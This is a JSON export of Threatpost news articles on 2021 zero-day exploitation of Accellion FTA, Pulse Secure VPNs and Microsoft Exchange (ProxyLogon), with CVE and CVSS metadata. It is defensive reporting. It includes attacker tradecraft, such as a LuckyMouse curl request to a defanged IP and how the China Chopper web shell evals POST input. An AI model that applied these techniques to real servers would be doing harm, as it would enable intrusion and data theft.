Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n\n** **\n", "cvss3": {}, "published": "2021-02-22T17:51:20", "type": "threatpost", "title": "Accellion FTA Zero-Day Attacks Tied to Clop, FIN11", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T17:51:20", "id": "THREATPOST:3661EA0D8FCA17978A471DB91405999A", "href": "https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-04T17:56:13", "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T17:42:30", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 